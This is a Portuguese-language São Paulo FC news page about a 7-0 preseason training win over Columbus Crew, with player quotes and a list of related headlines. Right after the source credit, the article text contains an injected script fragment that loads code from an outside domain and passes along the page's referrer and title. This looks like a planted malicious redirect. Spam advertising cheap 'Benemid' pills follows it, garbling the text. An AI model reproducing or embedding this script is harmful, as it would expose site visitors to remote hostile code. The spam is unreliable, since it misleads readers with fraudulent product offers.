Ultimas Noticias

Fim da Pré Temporada do São Paulo e sensação de missão cumprida! Veja os gols de hoje!

A partir do próximo final de semana, diante do Grêmio Osasco Audax, o Tricolor iniciará a sua trajetória nas competições de 2017. Por isso, para dar mais ritmo de jogo ao elenco e dar mais uma oportunidade para o técnico Rogério Ceni observar melhor os atletas, o São Paulo disputou um jogo-treino contra o Columbus Crew-EUA (7 x 0) neste domingo (29).

A partida amistosa, realizada no CFA Laudo Natel, em Cotia, foi exaltada pelos jogadores são-paulinos. “O jogo-treino foi muito bom para dar mais ritmo de jogo. A equipe se comportou bem e soube conquistar a vitória. Além disso, foi importante para o Rogério observar os jogadores de olho na estreia do Campeonato Paulista. Queremos começar o ano bem, com o pé direito, porque a nossa meta é ter uma temporada vitoriosa”, afirmou o atacante Luiz Araújo.


Até aqui, além do embate deste final de semana, a pré-temporada tricolor contou com dois jogos-treino nos Estados Unidos – diante de Sarasota FC e Boca Raton FC -, a disputa da Florida Cup e uma série de atividades técnicas e táticas – todas dinâmicas e com alta intensidade. De acordo com os atletas, o período de preparação tem sido produtivo e cada vez mais ajusta o time para o Campeonato Paulista e a Copa do Brasil.

“É importante adquirir ritmo de jogo, porque isso ajuda bastante na preparação. Temos aperfeiçoado a parte tática e aprimorado a nossa condição física a cada nova atividade, como o jogo treino deste domingo. Ainda temos mais uma semana de treinos antes da estreia, mas já vejo nosso elenco mais forte. Partidas como esta, contra o Columbus Crew, ajudam bastante na preparação”, avaliou o meio-campista Cícero, um dos atletas mais experientes do grupo.

O jogo-treino deste final de semana foi dividido em quatro tempos de 25 minutos cada, e duas equipes foram utilizadas: dois tempos para cada formação. Com gols de Cícero, Thiago Mendes, Wellington Nem, Chavez – na primeira parte – Gilberto, Neilton e Wesley – na etapa complementar -, o São Paulo bateu o adversário por 7 a 0.

“Nossa preparação tem sido excelente. Junto com o Rogério temos acertado o time para adquirir mais confiança antes do Paulista. O jogo-treino foi bom, porque sempre tiramos algumas lições em partidas assim. Vamos corrigir alguns erros para chegarmos bem na estreia do estadual. Vamos em busca de vitórias desde o primeiro jogo”, finalizou Bruno.

Fonte: Blog do São Paulos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Searching for a cost effective solution to buy your Benemid? You can get it for as much as 1.06 right now! pills store

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Ultimas Noticias

Mais em Ultimas Noticias

muricy-ramalho-durante-entrevista-no-condominio-onde-mora-em-sp-1505931581145_615x300

Muricy tem conversa com Dorival e sua comissão técnica no São Paulo

saopauloadmin22 de setembro de 2017
hernanes

Hernanes vai ao CT do Palmeiras, saiba o motivo

saopauloadmin22 de setembro de 2017
sidao

Sidão quer retribuir apoio dos torcedores com vitórias

saopauloadmin22 de setembro de 2017
pratto7_crop_galeria

Lucas Pratto vê clássico como “jogo chave”

saopauloadmin21 de setembro de 2017
Muricy Ramalho espera acabar com a fama de pé-frio

Muricy vê São Paulo favorito no clássico

saopauloadmin21 de setembro de 2017
hernanes

Jogadores aprovam e curtem o silêncio no São Paulo

saopauloadmin21 de setembro de 2017
pratto

Jejum de gols no São Paulo incomoda Pratto

saopauloadmin21 de setembro de 2017
treino

Dorival esboça time que enfrentará o Corinthians

saopauloadmin21 de setembro de 2017
junior

Junior Tavares dá volta por cima e arranca elogios internamente

saopauloadmin20 de setembro de 2017